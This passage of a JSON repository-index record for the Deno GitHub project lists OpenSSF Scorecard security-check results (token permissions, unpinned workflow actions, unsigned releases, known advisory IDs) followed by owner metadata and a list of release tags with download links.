.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind